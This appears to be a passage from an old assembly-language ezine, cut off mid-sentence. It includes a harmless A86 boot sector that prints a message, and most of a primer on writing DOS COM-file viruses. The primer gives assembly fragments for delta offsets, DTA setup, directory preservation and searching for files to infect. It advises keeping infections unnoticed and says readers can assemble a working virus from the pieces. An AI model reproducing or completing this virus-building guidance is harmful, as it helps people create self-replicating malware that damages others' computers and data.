unused or reserved area of memory where they can be further altered directly
while
reading memory. This could also be said to be the most dangerous method as it
can easily
lead to the accidental writing of other areas of memory, while this is true I
have also
found a benefit, if Define is stopped and then restarted the program being
written will
still be in memory without having been saved (depending on where in memory the
program is
being written.)
The maker of a violin, while demonstrating it, must have said at one time or
another "A
good violinist could really show you how to play it", I too like the maker of a
violin am
sure there are better definition writers than myself. To become a high level
language the
high level definitions need to be written and I ask any person who has a passion
for writing
hand written code to send me a definition or two to include in the definition
file.
You can download Define from my homepage at
http://members.net-tech.com.au/alaneb/default.htm
and there is a step by step guide to using the program in the zip file called
manual.doc.
Please send any definitions or reponse to Alan at alien1_3@...
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Writing a Boot Sector in A86
by Jan Verhoeven
I have been coding for FreeDOS some time, but that is a C project and I
rather hate C. It is so clumsy. That's also why I always code in A86
assembly language. The "No Red Tape" assembler that makes life a lot
easier for programmers.
A86 is good. The debugger (D86) could be better, but not too much. I
registered my version and I want to encourage everyone to follow my
lead. The software is good enough to pay for it. And it ensures proper
development of the software. If you can spare 20 bucks a month for the
ISP, you should also spend this on quality software.
During the last two years I have been submiutting bugs to Isaacson and
all of them have been fixed in the latest version (4.03).
Besides A86 being the best assembler around, it has some idiosyncracies
to which some people need to get used to. Plus my personal preferences,
which might add to that...
- When I refer to a memory location I use square brackets.
- I use single quotes for texts
- I use most of the A86 features.
Some of the A86 features are:
- very powerful macro language
- numbers starting with a ZERO are ALWAYS hex, no matter how they end
- easy IF statements to reduce nonsense labelnames
- local labels, like below: only two local labels.
I started out on the Z-8000, back in 1981, switched to the Z-80, Z-8,
8086, PIC 16Cxx, some 8051 (Barffff), some 68K (yummie yummie). Mainly
in ASM and else in Modula-2. I have some really cool and useful routines
lying around for DOS. And I'm gonna share them with the world.
The following code is a bootsector which can be used for noon-bootable
disks. In this case for a 1.44 Mb floppy disk. You could use it to make
a commercial out of every non-bootable disk.
First the code:
----- Code file -------------------------------------------------
name flopnb
title Floppy disk boot sector, non-bootable, 1.44 Mb
page 80, 120
; version 1.0 : It works : OK 12-12-1998
lf = 10
cr = 13
org 0
jmp short main ; this is critical!
nop ; and this too!
; ----------------------
OEMname db 'StupiDOS'
BpS dw 512 ; bytes per sector
SpA db 1 ; sectors per allocation unit (=cluster)
ResSect dw 1 ; reserved sectors, starting from sector 0
NrFats db 2 ; number of FAT's on this disk
FiR dw 224 ; number of entries in ROOT directory
Total dw 2880 ; number of sectors per disk
ToM db 0F0 ; Type of Media
SpF dw 9 ; Sectors per Fat
SpT dw 18 ; sectors per Track
Heads dw 2 ; number of heads
Hidden dw 0, 0 ; Hidden sectors
GrandTot dd 0 ; total for disks over 32 Mb
IntId db 0, 0
BootSign db 029 ; extended boot signature
VolumeID dd 0566E614A ; serial number ...
DiskLabl db 'DOS is MINE' ; volume label
FATtype db 'FAT-12 ' ; FAT type
db 'VeRsIoN=1.0', 0 ; for version control only
; ----------------------
L1: push si ; stack up return address
ret ; and jump to it
print: pop si ; this is the first character
mov bx, 0 ; video page 0
L0: lodsb ; get token
cmp al, 0 ; end of string?
je L1 ; if so, exit
mov ah, 0E ; else print it
int 010 ; via TTY mode
jmp L0 ; until done
; ----------------------
main: cld ; init direction flag
cli ; take care of 1 faulty batch of 88's in 1980
mov ax, 07C0 ; this is the segmentvalue at start
mov ds, ax ; store it in DS, ES
mov es, ax
mov ax, 0 ; clear ax ...
mov ss, ax ; ... to prime the SS register
mov sp, 07C00 ; set stackpointer
sti ; OK, interrupts may come again
call print ; show that message
db cr
db 'This is not a bootable floppy. '
db 'Please strike any key to reboot.', cr, lf
db 'This floppy disk is formatted by FreeDOS', cr, lf, lf
db 'Please visit us at www.freedos.org', cr, lf, 0
L0: mov ah, 1 ; wait for keypress by ...
int 016 ; ... interrogating keyboard
jz L0 ; if no key pressed, loop back
mov ax, 0 ; else address system variables
mov es, ax ; in order to ...
es mov w [0472], 01234 ; signal: NO POST and go on ...
jmp 0FFFF:0000 ; with the next reboot
org 01FE ; look for the dotted line and ...
db 055, 0AA ; ... don't forget to sign!
------------------------------------------------- Code file -----
The first three lines are straightforward: name, title and page. Not
much to tell about that. Then some version info for the programmer, some
equates and the ORG statement.
If no ORG is supplied, A86 will assume it is ORG 0100. I ordered an ORG 0,
which means several things:
- start assembly at address 0
- the output file will be called *.BIN
Bootsectors must start with some particular bytes. Therefore the first
three bytes need to be either a short jump, a variable offset plus a
NOP. Or a (long) jump without a NOP.
At offset 03 of the bootsector starts the DPB (Disk Parameter Block)
which tells the OS what kind of disk this is. It starts off with an OEM
name. Please put ASCII in there, or virus scanners might trip on it with
a "Bloodhound warning".
After the description of the geometry of this disk, I included an
extended boot signature, since we have ample room left. It contains
Volume ID, Disk Label, and FAT-type strings.
The PRINT subroutine is a nice one. It will print the ASCIIZ string that
follows it. This is quite a handy routine since you can simply change
messages without having to worry about the address and length of the
actual message.
Print is called like this:
call print
db 'Hello World', cr, lf, 0
...
Print takes the "return address" off the stack. This of course is no
return address but the address of the message. What follows is easy:
- get next character
- IF (non-zero) print character ELSE leave loop ENDIF
- the current si pointer is the actual return address... So we push it
- and return to caller.
Perhaps a jmp si could be possible too, but I like clear code, in most
cases. If you need obfuscated code, switch to C. :)
The actual program is very simple. It just sets up a stack and the
segment registers, and then prints that it will do nothing. Gee, what a
life...
After the message we wait for a key and next signal:
- fast reboot
- jump to the reboot vector
Whatever there will be between end of code and offset 01FE is not
relevant (it could be your ad) but the last two bytes of the boot sector
must be a valid boot signature.
That's it. With this code you can make your own custom non-bootsector.
I hope this software has also shown that linking and assuming are
supported by A86, but certainly not necessary. Also, this software does
not rely on any HLL calls. It's just assembly language as it should be.
I want to remark that this software is Open Source, according to the rules
of the GNU GPL. Make sure you understand these rules before embedding this
routine in your own software.
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
A Basic Virus Writing Primer
by Chili
What horror must the ignorant victim undergo as it becomes aware of a being
that lives inside its own body, growing ever stronger, reproducing itself until
its host, unable to bear more finally colapses and dies an horrible death. What
panic it must feel, knowing nothing can be done in time to avoid such a
terrible fate. A predator so tiny, that unsuspectedly it spreads from one host
to another, by so rapidly infecting millions. An organism, so utterly
resourceful and small, that it stays most of the time undetectable, breeding in
the shadows.
Computer viruses aren't much different from their biological counterpart, but
instead of infecting cells they infect files and boot sectors. In this article
I'll try to explain the basics of file viruses, more specifically runtime (aka
direct action) COM infectors. This will cover most simple search and
replication methods used and is only to be considered as an introduction to
virus writing. After some thought I've decided not to include any full source
code for a working virus, since anyone with half a brain and a somewhat
mediocre knowledge of assembly can easily build a virus out of the pieces of
code that will be presented. Furthermore it's not my wish to increase the
number of viruses in the wild, thing that would undoubtedly happen by the hands
of some I-have-no-brain-and-can't-program-hellspawn bent on random destruction.
Anyway, on with the article...
Some Sort Of 'Programming Virii Safely' Guide
---------------------------------------------
The only really safe way to program viruses is to know what you're doing and
understand at every time how the virus is behaving. If you test a virus on
your
own machine without fully comprehending its ins and outs, then you will most
likely have your system trashed. It would be best if you had a second computer
just for this purpose, since a buggy programming can lead to a lot of crashes
and general havoc. If not, a Ramdrive can be created and a Subst can be done,
so that all accesses to physical drives are redirected to the virtual one.
Assuming that you want your Ramdrive to have 512-byte sectors, a limit of 1024
entries and to allocate 2048K of extended memory, you must add this line to
your
CONFIG.SYS:
DEVICE=C:\DOS\RAMDRIVE.SYS 2048 512 1024 /E
Then you must copy COMMAND.COM and SUBST.EXE to the Ramdrive so that DOS won't
hang and also in order for you to be able to delete all redirections when done.
And to associate all physical drives to the newly created virtual drive (and
assuming that it is D: and all your drives are A: and C:) you should do:
SUBST A: D:\
SUBST C: D:\
Of course this last method isn't perfect. You should always know how to
completely remove a virus before running it, or you'll end cleaning up the mess
for quite some time.
Just use common sense. For example, if you're writing a virus aimed at a
specific file type, all you have to do is copy all files of that type you do
not wish to be infected to a different extension and when you're done testing
just switch those files back to their original extension. While testing you
should also place breakpoints and warning messages throughout the code, so
that you know at all times what the virus is doing as well as it will help you
debugging it. Also you should program and test different routines separately as
it will reduce complexity and bug proneness. Lastly the use of memory and disk
mapping/editing utilities, a set of good anti-virus and most important the use
of backups is encouraged, so that you can keep track of things and are able to
restore your system in case something goes wrong.
In case things get really out of hand you should always have a clean "rescue
disk" which you should create by doing a FORMAT A: /S /U and then copying into
it some useful DOS files like FORMAT.COM, UNFORMAT.COM, FDISK.EXE, SYS.COM,
MEM.EXE, ATTRIB.EXE, DEBUG.EXE, CHKDSK.EXE, SUBST.EXE, a text editor just in
case and whichever other files you may find useful. Also an anti-virus should
be included along. Don't forget to write protect the disk and put it in a safe
place. The first thing you should do in order to clean up your system is to
boot from your previously created disk and use your anti-virus clean and
restoration features, as most times this will work, saving you a lot of hassle.
In last resort, you should run FDISK /MBR to re-write the executable code and
error messages of the partition sector, then run FDISK and first delete, then
create a new partion table and finally run FORMAT C: /S /U. Your system should
now be completely clean and you can restore your backups at this time. If all
you want is to clean a floppy disk instead of a hard disk, then all you have to
do is run FORMAT A: /S /U to create a new boot sector, FAT and root directory.
Of course that after this procedures all data will be lost, so as I said before
this should only be used if you're really desperate.
Above all, don't forget to backup, backup, backup!
Tools & References
------------------
In order to write and test a sucessful virus you need some useful programs and
references, such as:
- An assembler (TASM, MASM, Intel's ASM86, A86, NASM, ...) - I recommend using
Turbo Assembler, as all code I will provide will be tested with it.
- A linker (TLINK, LINK, Intel's LINK86...) - Again I recommend Turbo Linker.
- A debugger (Dos' DEBUG, TD, ...) - Dos' DEBUG is old but will do the job, you
can use Turbo Debugger though, as it is somewhat better.
- A text and a hex editor of your choice.
- A disassembler (DEBUG, Sourcer, IDA, ...) - You can use Dos' DEBUG, but would
be better if you used Sourcer which is very good or IDA which is excellent
but very large in size.
- Some other things like TSR Utilities by TurboPower Software, Norton Utilities
and more.
- A good set of Anti-Virus packages, such as ThunderBYTE Anti-Virus (as a great
set of utilities to backup your bootsector, partition table and CMOS), AVP
(AntiViral Toolkit Pro) and F-PROT. Also available are McAfee (now Network
Associates, I think) VirusScan, Dr.Solomon's AVTK and Norton Anti-Virus.
- Ralph Brown's x86/MSDOS Interrupt List, Norton Guides' Assembly Language
database, David Jurgens' HelpPC, DOSREF (Programmers' Technical Reference for
MSDOS and the IBM PC) and others you find useful.
On Viruses
----------
There are two things that must always be present on every working virus, first
the search routine that seeks for suitable targets for the virus to infect and
lastly the replication routine that copies the virus to the found target. Other
routines may also be added in order to enhance the virus and the two more basic
and essencial parts can be improved, increasing its performance, albeit its
complexity too.
I intentionally left out a major routine, the payload (aka activation routine),
though not necessary, it is present in almost all viruses. Sincerely I see no
real use for most activation routines, since all they do is seriously cripple
the virus's chance to spread. Besides, all good payloads must be custom made (as
should all viruses, but that's another story...), so you'll have to build your
own if you want one. For some old good examples of non-destructive payloads
take a look at Ambulance Car, Cascade, Den Zuk, Corporate Life and Crucifixion.
All code presented hereafter was first tested on both of my machines and works,
but this doesn't mean that it will work on all possible configurations, so I
can't fully guarantee that it won't ever cause unwanted damage. It's bad enough
that your virus may unwillingly trash someone's data, so don't go writing
destructive payloads just for the hell of it. Programming - and therefore virus
writing - is an art, treat it as such.
A Word On Error Trapping
------------------------
Error trapping is regrettably one of the most forgotten things in viruses. You
should always account for errors in order not to crash and even trash things.
This doesn't mean that you should present cute DOS-like error messages, as this
would alert the user, instead you should process the information and act
accordingly. That most times just means that you should abort the virus ongoing
operations and restore control back to the host.
Optimization
------------
All code will be presented in an unoptimized form for ease of understanding and
also because all routines are shown seperate from each other so that they are
portable to different kinds of viruses. When writing a full virus you should
always optimize your code, so that it takes as little space as possible. Don't
use procedures unless you can save space by doing so. Also don't use variables
when you can use registers (for example the F_Handle variable needs not be used
since you could just use the stack or some free register - see below).
Delta Offset
------------
When you're programming a virus that will always be placed at a fixed location,
like overwriting and prepending viruses, you won't have to worry about any of
this, but if you're writing a virus that relocates part of its code to a random
location, such as appending and midfile infectors, you'll have to account for
the displacement. This doesn't affect most jumps and calls, since they are
relative, but data on the other hand is refered by an absolute offset. Things
would work fine the first time you assembled and run the virus, but not after
the first infection when all memory addresses would then be changed.
To account for this all one has to do is:
--8<---------------------------------------------------------------------------
Delta_Offset:
call Find_Displacement
Find_Displacement:
pop bp
sub bp, offset Find_Displacement
---------------------------------------------------------------------------8<--
What this piece of code does is, first issue a CALL to the next instruction, so
the IP (Instruction Pointer) for it will pushed into the stack, next we POP it
to the register BP (it is good programming to use BP, which stands for Base
Pointer), and finally we SUBtract the original OFFSET determined when the virus
was compiled. Of course the first time the virus is run, the displacement will
be zero, only on subsequent runs will it change according to the host size.
I'll be presenting code for infectors that require delta offset calculation, so
for all the other infectors that don't, in order to accommodate any of the code
presented hereafter you'll just have to strip out any displacement calculations
as in the following examples:
Replace
lea dx, [bp+offset DTA]
With
lea dx, DTA
Replace
mov word ptr [bp+F_Handle], ax
With
mov F_Handle, ax
Once you've given it a little thought and figured it out it's not as hard as it
may first seem. Of course that even if you're programming a fixed location
virus you can still leave all code as if you were writing one that needed you
to calculate the delta offset, since the displacement is always zero.
Nevertheless you shouldn't do this, mainly because it adds unnecessary size to
the virus and it is extremely sloppy (and lazy) programming (copying?!?!).
.COM File Structure
-------------------
COM files are raw binary executables, designed for compatibility with the old
CP/M operating system. Whenever a COM file is executed, DOS first sets aside a
segment (64K) of memory for it, then builds a PSP (Program Segment Prefix) in
the first 256 bytes, after which the program is loaded into. Before passing
control to the program DOS does some things first, among which are:
1) Register AX reflects the validity of drive specifiers entered with the
first two parameters as follows:
AL=0FFh if the first parameter contained an invalid drive specifier,
otherwise AL=00h
AL=0FFh if the second parameter contained an invalid drive specifier,
otherwise AL=00h
2) All four segment registers contain the segment address of the PSP control
block
3) The Instruction Pointer (IP) is set to 100h
4) The SP register is set to the end of the program's segment and a word of
zeroes is placed on top of the stack
In case any of this things are changed during the virus execution, you
shouldn't forget to restore them before passing control back to the host.
So, given this, a COM file program can only have a maximum size of 65277 bytes,
since you have to account for the PSP and at least for the two bytes occupied
by the stack. Here is how a COM file looks when loaded in memory:
FFFFh +--------------------+ <- SP
| |
| Stack |
| |
+--------------------+
| |
| Uninitialized Data |
| |
+--------------------+
| |
| COM File Image |
| |
100h +--------------------+ <- IP
| |
| PSP |
| |
0h +--------------------+ <- CS, DS, ES, SS
Don't forget to account for stack growth needed by your program as well as any
uninitalized data, for if you don't there is a chance that it will crash, since
the stack may grow large enough to overwrite data or code, or your data may
wrap around and overwrite the PSP and the code.
Program Segment Prefix (PSP)
----------------------------
A PSP is created by DOS for all programs and contains most of the information
one needs to know about them. Its structure looks like this:
[ PSP - Program Segment Prefix ]
Offset Size Description
------ ---- -----------
0h Word INT 20h instruction
2h Word Segment address of top of the current program's
allocated memory
4h Byte Reserved
5h Byte Far call to DOS function dispatcher (INT 21h)
6h Word Available bytes in the segment for .COM files
8h Word Reserved
Ah Dword INT 22h termination address
Eh Dword INT 23h Ctrl-Break handler address
12h Dword DOS 1.1+ INT 24h critical error handler address
16h Byte Segment of parent PSP
18h 20 Bytes DOS 2+ Job File Table (one byte per file handle
FFh = available/closed)
2Ch Word DOS 2+ segment address of process' environment
block
2Eh Dword DOS 2+ process' SS:SP on entry to last INT 21h
function call
32h Word DOS 3+ number of entries in JFT
34h Dword DOS 3+ pointer to JFT
38h Dword DOS 3+ pointer to previous PSP
3Ch 20 Bytes Reserved
50h 3 Bytes DOS 2+ INT 21h/RETF instructions
53h 9 Bytes Unused
5Ch 16 Bytes Default unopened File Control Block 1 (FCB1)
6Ch 16 Bytes Default unopened File Control Block 2 (FCB2)
7Ch 4 Bytes Unused
80h Byte Command line length in bytes
81h 127 Bytes Command line (ends with a Carriage Return 0Dh)
Note: For a more detailed explanation of the PSP structure, including many
undocumented features, see Ralph Brown's x86/MSDOS Interrupt List.
And here are the default file handles for the Job File Table (JFT):
[ DOS Default/Predefined File Handles]
0 - Standard Input Device, can be redirected (STDIN)
1 - Standard Output Device, can be redirected (STDOUT)
2 - Standard Error Device, can be redirected (STDERR)
3 - Standard Auxiliary Device (STDAUX)
4 - Standard Printer Device (STDPRN)
The File Control Block (FCB) and the Environment Block structures will be
covered on a later article, as they aren't needed for now.
Disk Transfer Area (DTA)
------------------------
For all file reads and writes performed using FCB function calls, as well as
for "Find First" and "Find Next" calls using FCBs or not, DOS uses a memory
buffer called Disk Transfer Area, which is by default located at offset 80h in
the PSP and is 128 bytes long (this area is also used by the command tail), so
in order not to interfere with whichever command line parameters there might
be, the Disk Transfer Address should be set to a different location in memory.
This is done like this:
--8<---------------------------------------------------------------------------
Set_DTA:
mov ah, 1Ah
lea dx, [bp+offset DTA]
int 21h
---------------------------------------------------------------------------8<--
;Interrupt: 21h
;Function: 1Ah - Set Disk Transfer Address (DTA)
;On entry: AH - 1Ah
; DS:DX - Address of DTA
;Returns: Nothing
Of course that before passing control back to the host you should restore the
Disk Transfer Address back to its original value:
--8<---------------------------------------------------------------------------
Restore_DTA:
mov ah, 1Ah
mov dx, 80h
int 21h
---------------------------------------------------------------------------8<--
A sufficient buffer area should always be reserved, as DOS will detect and
abort any disk transfers that would fall off the end of the current segment or
wrap around within the segment.
FindFirst Data Block
--------------------
Upon a successful "Find First Matching File" function call the Disk Transfer
Area is filled with a FindFirst Data Block which contains info on the matching
file found, also after a "Find Next Matching File" function call that data is
updated. As we'll only be using the DTA for this, all we need to when setting a
new one is to have a 43 bytes long buffer so that we can allocate the FindFirst
Data Block:
--8<---------------------------------------------------------------------------
DTA:
Reserv db 21 dup (?)
F_Attr db (?)
F_Time dw (?)
F_Date dw (?)
F_Size dd (?)
F_Name db 13 dup (?)
---------------------------------------------------------------------------8<--
And here is the FindFirst Data Block structure:
[ FindFirst Data Block ]
Offset Size Description
------ ---- -----------
0h 21 Bytes Reserved for DOS use on subsequent Find Next
calls - is different per DOS version
15h Byte Attribute of matching file
16h Word File time stamp
18h Word File date stamp
1Ah Dword File size in bytes
1Eh 13 Bytes ASCIIZ filename and extension
The file attribute field looks like this:
[File Attribute]
Bit(s) Description
------ -----------
7 6 5 4 3 2 1 0
. . . . . . . 1 Read-only
. . . . . . 1 . Hidden
. . . . . 1 . . System
. . . . 1 . . . Volume label
. . . 1 . . . . Directory
. . 1 . . . . . Archive
x x . . . . . . Unused
The file time field is like this:
[File Time]
Bit(s) Description
------ -----------
F E D C B A 9 8 7 6 5 4 3 2 1 0
. . . . . . . . . . . x x x x x Seconds/2 (0..29) - 2 second increments
. . . . . x x x x x x . . . . . Minutes (0..59)
x x x x x . . . . . . . . . . . Hours (0..23)
And finally the file date field like this:
[File Date]
Bit(s) Description
------ -----------
F E D C B A 9 8 7 6 5 4 3 2 1 0
. . . . . . . . . . . x x x x x Day (1..31)
. . . . . . . x x x x . . . . . Month (1..12)
x x x x x x x . . . . . . . . . Year since 1980 (0..119)
Current Directory Preservation
------------------------------
If you're searching for files outside the directory where your virus was run
from, you must save the old directory and restore it when you're done. First to
save it you must do:
--8<---------------------------------------------------------------------------
Get_Directory:
mov ah, 47h
mov dl, 0
lea si, [bp+offset Orig_Dir]
int 21h
jnc Find_First
jmp Return_Control
---------------------------------------------------------------------------8<--
;Interrupt: 21h
;Function: 47h - Get Current Directory
;On entry: AH - 47h
; DL - Drive number (0=default, 1=A, etc.)
; DS:SI - Pointer to a 64-byte buffer
;Returns: AX - Error code, if CF is set
;Error codes: 15 - Invalid drive specified
;Notes: This function returns the full pathname of the current directory,
; excluding the drive designator and initial backslash character, as an
; ASCIIZ string at the memory buffer pointed to by DS:SI.
A 64 byte long buffer must be present to hold the original directory:
--8<---------------------------------------------------------------------------
Orig_Dir db 64 dup (?)
---------------------------------------------------------------------------8<--
Then before actually restoring to the old directory, you must first change to
the root directory and then restore from there, since all paths are relative to
it.
--8<---------------------------------------------------------------------------
ChangeTo_Root:
mov ah, 3Bh
lea dx, [bp+offset Root]
int 21h
jc Restore_DTA
---------------------------------------------------------------------------8<--
;Interrupt: 21h
;Function: 3Bh - Change Directory (CHDIR)
;On entry: AH - 3Bh
; DS:DX - Pointer to name of new default directory (ASCIIZ
; string)
;Returns: AX - Error code, if CF is set
;Error Codes: 3 - Path not found
;Notes: This function changes the current directory to the directory whose path
; is specified in the ASCIIZ string at address DS:DX; the string length
; is limited to 64 characters. The path name may include a drive letter.
A buffer containing a ASCIIZ string representing the root:
--8<---------------------------------------------------------------------------
Root db '\', 0
---------------------------------------------------------------------------8<--
And finally you switch to the original directory (if the original directory is
the root there will be an error since the path won't be valid - this doesn't
matter since we changed to root before):
--8<---------------------------------------------------------------------------
Restore_Directory:
mov ah, 3Bh
lea dx, [bp+offset Orig_Dir]
int 21h
;jc Restore_DTA ;No need, since it's right after
---------------------------------------------------------------------------8<--
If you change drives while searching for files to infect (this will be covered
in a next article) you should also preserve the original drive and then restore
it in the end.
File Search Techniques
----------------------
A runtime virus can infect files located in the current directory, in
subdirectories, maybe only in root, in the PATH and even on different drives.
You must be very careful when writing your search routine, since if you only
infect files in a few places your virus won't spread much, but if you search
for files to infect in every possible place, after the first infections it will
start to take much longer to find new hosts (since most are already infected)
and disk activity might last for long enough to be noticeable. Some of this
techniques are presented below. The others will be presented on a next article.
Find First/Find Next
--------------------
This is used when you want to search for files on a the current directory. You
start by searching for the first matching COM file with normal attributes:
--8<---------------------------------------------------------------------------
Find_First:
mov ah, 4Eh
mov cx, 0
lea dx, [bp+offset COM_Mask]
int 21h
jnc Open_File
jmp Return_Control
---------------------------------------------------------------------------8<--
;Interrupt: 21h
;Function: 4Eh - Find First Matching File (FIND FIRST)
;On entry: AH - 4Eh
; CX - File attribute
; DS:DX - Pointer to filespec (ASCIIZ string)
;Returns: AX - Error code, if CF is set
;Error codes: 2 - File not found
; 3 - Path not found
; 18 - No more files to be found
;Notes: If CX is 0, the function searches for normal files only. If C